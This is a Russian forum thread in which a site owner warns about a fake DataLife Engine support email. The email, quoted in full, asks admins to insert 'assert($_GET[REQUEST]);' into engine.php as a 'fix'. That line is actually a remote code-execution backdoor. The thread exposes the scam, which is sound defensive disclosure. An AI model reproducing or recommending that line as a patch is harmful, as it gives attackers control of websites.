VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
Гениальная идея школохакеров. Взломай свой сайт сам
11
Возможно, кто-то использует такой движок как ДЛЕ для собственных или клиентских сайтов. Возможно, кому-то эта информация окажется полезной.
Намедни, получаю письмо через форму обратной связи следующего содержания:
Quote:
Здравствуйте, уважаемый клиент!
Благодарим Вас за использование на Вашем сайте ***.ru нашего ПО «CMS DataLife Engine - Система управления сайтами».
Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.
По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.
Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: /engine/engine.php и в самое начало файла после строчки:
<?php
добавьте:
assert($_GET[REQUEST]);
С уважением,
Служба поддержки «DataLife Engine»
Что сразу насторожило, что письмо пришло не на емейл в профиле ДЛЕньюз, а через форму обратной связи. Естественно, что саппорт делает рассылки по емейлам в профиле, а не выискивает сайты на движке ДЛЕ
Дабы удостовериться, что это фейк, связываюсь с поддержкой DataLife Engine. Оказывается, все верно. Письмо не имеет никакого отношения к саппорту ДЛЕ, а это мегашколохакеры.
Ну, гениально же! Называется взломай свой сайт сам!
Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: /engine/engine.php и в самое начало файла после строчки:
Что бы какеры, не непрягаясь, заливали шеллы на сайт. Совсем школота разленилась.
Veterblack
Специалист
Join Date: May 2008
Награды в конкурсах:
Posts: 585
Версия vB: 3.8.x
Пол:
Reputation:
Professional 563
Репутация в разделе: 224
1
Ну как бы DLE считается все еще уязвимым движком
Правда десятка уже в корне отличается от более древних версий своей защищенностью. Попытки взломов я видел на девятой линейке, правда ничего у них не заработало а вот на десятой пока нет.
Luvilla
Гость
Posts: n/a
Quote:
Originally Posted by Veterblack
Ну, гениально же!
именно!
рыдаю...
интересно, много ли народу повелось на это "уведомление"?
Veterblack
Специалист
Join Date: May 2008
Награды в конкурсах:
Posts: 585
Версия vB: 3.8.x
Пол:
Reputation:
Professional 563
Репутация в разделе: 224
2
Я думаю, что будет потерпевших достаточное количество...
Smalesh
В Черном списке
Join Date: Oct 2006
Награды в конкурсах:
Posts: 3,055
Версия vB: 3.8.7
Пол:
Reputation:
Мастер 3981
Репутация в разделе: 680
0
Quote:
Originally Posted by Luvilla
интересно, много ли народу повелось на это "уведомление"?
Анальную пробку в Париже помнишь? Можешь рядом ставить вторую.
Luvilla
Гость
Posts: n/a
Quote:
Originally Posted by Veterblack
Я думаю, что будет потерпевших достаточное количество...
увы, да
Quote:
Originally Posted by Smalesh
Можешь рядом ставить вторую.
"Вот тебе, Золушка, хрустальная пробочка"
@WELLMOR
Продвинутый
Join Date: Jul 2012
Location: Ростов-на-Дону
Posts: 40
Версия vB: 4.2.х
Пол:
Reputation:
Опытный 32
Репутация в разделе: 31
0
Всегда кто-нибудь ведется на такое, это как платные sms, главное не терять бдительность товарищи.